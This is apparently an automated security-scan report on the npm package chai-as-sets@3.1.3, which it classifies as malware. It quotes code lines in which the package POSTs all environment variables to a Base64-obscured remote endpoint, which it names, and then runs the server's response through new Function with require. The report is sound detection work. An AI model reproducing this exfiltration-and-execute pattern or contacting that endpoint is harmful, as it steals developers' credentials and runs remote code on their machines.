registry  /  chai-as-sets  /  3.1.3

chai-as-sets@3.1.3

This document describes the management of vulnerabilities for the project and all modules within the organization.

AI Security Review

scanned 2h ago · by lpm-firewall-ai

Runtime invocation of the package export launches a detached background process. That process exfiltrates environment variables and executes attacker-controlled server code.

Static reason
One or more suspicious static signals were detected.; source fingerprint signature matched known malicious package; routed for review
Trigger
Calling the exported middleware, including use through `chai.use(...)`.
Impact
Credential leakage and arbitrary code execution in the consumer's Node environment.
Mechanism
Detached env exfiltration followed by remote JavaScript execution.
Attack narrative
When the exported function is invoked, `index.js` starts a detached child running `lib/initializeCaller.js`. The child sends all environment variables to a Base64-obscured remote endpoint, then compiles and executes its response with access to `require`. This provides a concrete credential-exfiltration and remote-code-execution chain without user consent.
Rationale
Direct source inspection confirms active environment exfiltration and execution of remotely supplied code on normal package use. The package identity and documentation are inconsistent with its behavior.
Evidence
package.jsonindex.jslib/initializeCaller.jsREADME.md
Network endpoints1
ipcheck-hashed.vercel.app/api/auth/00fbe23fd7efc30639f1

Decision evidence

public snapshot
AI called this Malicious at 99.0% confidence as Malware with low false-positive risk.
Evidence for block
  • `index.js` exports middleware unrelated to Chai and spawns a detached Node child when invoked.
  • `lib/initializeCaller.js` Base64-decodes `https://ipcheck-hashed.vercel.app/api/auth/00fbe23fd7efc30639f1`.
  • The child POSTs the complete `process.env` object to that endpoint.
  • `lib/initializeCaller.js` executes the server response with `new Function("require", response.data)`.
  • The response receives `require`, enabling arbitrary module access and execution.
  • README/package metadata claim `chai-as-sets` while most source is an incomplete Pino-derived tree.
Evidence against
  • `package.json` has no preinstall/install/postinstall lifecycle hook.
  • No local filesystem-write or AI-agent-control-surface mutation was found in inspected source.
Behavioral surface
Source
ChildProcessEnvironmentVarsEvalNetwork
Supply chain
HighEntropyStringsUrlStrings
ManifestNo manifest risk signals triggered.
scanned 16 file(s), 52.3 KB of source, external domains: github.com

Source & flagged code

7 flagged · loading source
index.jsView file
3const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants');
High
Child Process

Package source references child process execution.

index.jsView on unpkg · L3
3Cross-file remote execution chain: index.js spawns lib/initializeCaller.js; helper contains network access plus dynamic code execution. L3: const path = require('path'); L4: const { spawn } = require('child_process'); L5: const { DEFAULT_LEVELS, SORTING_ORDER } = require('./lib/constants'); ... L37: function runBackgroundTask(args) { L38: const scriptPath = path.resolve(__dirname, './lib/initializeCaller.js'); L39:
High
Cross File Remote Execution Context

Source spawns a local helper that also contains network and dynamic execution context; review data flow before blocking.

index.jsView on unpkg · L3
matchType = malicious_source_fingerprint_signature signature = b37b7f32e1e38926 signatureType = suspicious_hashes sourceLabel = final_verdict:malicious matchedPackage = chai-as-const@1.4.5 matchedPath = index.js matchedIdentity = npm:Y2hhaS1hcy1jb25zdA:1.4.5 similarity = 1.000 shingleOverlap = 12 summary = package final verdict is malicious
High
Known Malware Source Fingerprint Signature

Source fingerprint signature matches a known malicious package signature; route for source-aware review.

index.jsView on unpkg
lib/initializeCaller.jsView file
2L3: const axios = require("axios"); L4: const configEndpoint = "[redacted]"; ... L8: Buffer.from(configEndpoint, 'base64').toString('utf-8'), L9: { ...process.env }, L10: { headers: { "x-secret-header" : "secret" } } ... L12: try { L13: const executor = new Function("require", response.data); L14: executor(require);
High
Same File Env Network Execution

A single source file combines environment access, network access, and code or shell execution; review context before blocking.

lib/initializeCaller.jsView on unpkg · L2
2L3: const axios = require("axios"); L4: const configEndpoint = "[redacted]"; ... L6: (async function initializeCaller(..._args) { L7: const response = await axios.post( L8: Buffer.from(configEndpoint, 'base64').toString('utf-8'), L9: { ...process.env }, L10: { headers: { "x-secret-header" : "secret" } } ... L12: try { L13: const executor = new Function("require", response.data); L14: executor(require);
High
Base64 Obscured Url

Source decodes a Base64-obscured HTTP endpoint at runtime.

lib/initializeCaller.jsView on unpkg · L2
12try { L13: const executor = new Function("require", response.data); L14: executor(require);
Low
Eval

Package source references a known benign dynamic code generation pattern.

lib/initializeCaller.jsView on unpkg · L12
docs/transports.mdView file
550patternName = generic_password severity = medium line = 550 matchedText = password...rd',
Medium
Secret Pattern

Hardcoded password in docs/transports.md

docs/transports.mdView on unpkg · L550

Findings

5 High3 Medium4 Low
HighChild Processindex.js
HighSame File Env Network Executionlib/initializeCaller.js
HighCross File Remote Execution Contextindex.js
HighBase64 Obscured Urllib/initializeCaller.js
HighKnown Malware Source Fingerprint Signatureindex.js
MediumNetwork
MediumEnvironment Vars
MediumSecret Patterndocs/transports.md
LowScripts Present
LowEvallib/initializeCaller.js
LowHigh Entropy Strings
LowUrl Strings